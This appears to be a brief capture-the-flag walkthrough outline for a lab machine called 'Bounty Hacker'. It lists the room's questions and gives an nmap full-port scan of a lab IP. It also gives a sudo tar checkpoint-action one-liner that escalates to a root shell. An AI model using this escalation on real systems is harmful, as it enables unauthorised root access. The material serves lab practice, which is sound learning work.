Bounty Hacker

Task 1 Living up to the title.

Deploy the machine.

Find open ports on the machine

nmap -sC -sV -T5 -p1-65535 10.10.40.31

Who wrote the task list?

What service can you bruteforce with the text file found?

What is the users password?

user.txt

root.txt

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Last updated

Was this helpful?